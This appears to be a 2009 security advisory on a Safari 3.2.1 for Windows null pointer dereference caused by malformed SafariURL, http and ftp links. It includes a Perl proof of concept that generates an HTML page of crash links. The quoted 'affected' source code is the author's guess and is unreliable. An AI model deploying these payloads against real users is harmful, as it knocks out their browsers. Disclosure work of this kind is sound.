Safari 3.2.1 Null Dereference

`##############################################  
Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)  
Vendor:http://www.apple.com  
original advisore:http://lostmon.blogspot.com/2009/01/  
safari-321-for-windows-safariurl.html  
vendor notify:YES Exploit available: Private  
##############################################  
  
This article is a "second" part of :  
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html  
  
Safari for windows in prone vulnerable to a null pointer deference  
in protocols handlers http, ftp and SafariURL.  
  
The issue is triggered when a user in click a specially crafted link  
with malformed uri that causess a NULL pointer derefence safari,  
and will result in loss of availability for the browser.  
  
In the case of SafariURL is very curious, because we can compose  
a malformed url like SafariIRL://http://../ or ftp://../ and wen  
try to open it whith safari,safari opens a new windows , and wen  
we try to close this new one,clicking in the 'X' the window is  
closed, but it reopens again ...  
  
sO why it opens again in a infinite loop?  
Take a look of posible source code of the fucnction.  
in any place of the code before using a pointer,  
it check that it is not equal to NULL:  
  
######################  
Part of code affected  
######################  
  
CFURLRef safariURL = nil;  
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator,  
CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)  
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit  
require Safari to run. Please check that it is available and then try  
again.");  
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL  
path]];  
CFRelease(safariURL);  
return safariBundle; }  
  
###############################  
  
Simple PoC  
  
  
################################################  
# !/usr/bin/perl  
# Safari_httpDoSPoc.pl  
# Safari for Windows 3.2.1 Remote http: uri handler DoS  
# Lostmon [[email protected] ]  
#[http://lostmon.blogspot.com]  
  
  
$archivo = $ARGV[0];  
if(!defined($archivo))  
{  
  
print "Uso: $0 <archivo.html>\n";  
  
}  
  
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By  
Lostmon</title>  
<body>" . "\n";  
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(  
[email protected]) http://lostmon.blogspot.com</h3>  
<P>This PoC is a malformed http ,safariurl and ftp URI, this causes that  
safari for windows<br>  
turn inestable and unresponsive.<br>  
Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or  
this other =><a href=\SafariURL://"http://./\">Safari Die()</a>  
<br>  
=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a  
href=\SafariURL://"ftp://./\">Safari Die()</a>  
";  
$piepag = "</body></html>";  
  
$datos = $cabecera . $codigo . $piepag;  
  
open(FILE, '>' . $archivo);  
print FILE $datos;  
close(FILE);  
  
exit;  
  
############################################  
  
  
  
I don´t know if it has remote code execution, or other  
i make SEVERAL test and only can cause a DoS ,  
i don´t know if we can change NSBundle...  
  
Thnx To estrella to be my ligth  
Thnx to all Lostmon Team.  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`